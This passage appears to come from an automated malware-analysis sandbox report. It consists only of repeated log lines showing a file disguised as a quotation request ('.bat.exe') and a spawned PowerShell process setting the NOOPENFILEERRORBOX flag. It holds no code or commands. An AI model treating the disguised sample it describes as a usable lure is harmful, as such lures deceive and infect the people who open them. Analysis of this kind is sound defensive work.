Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
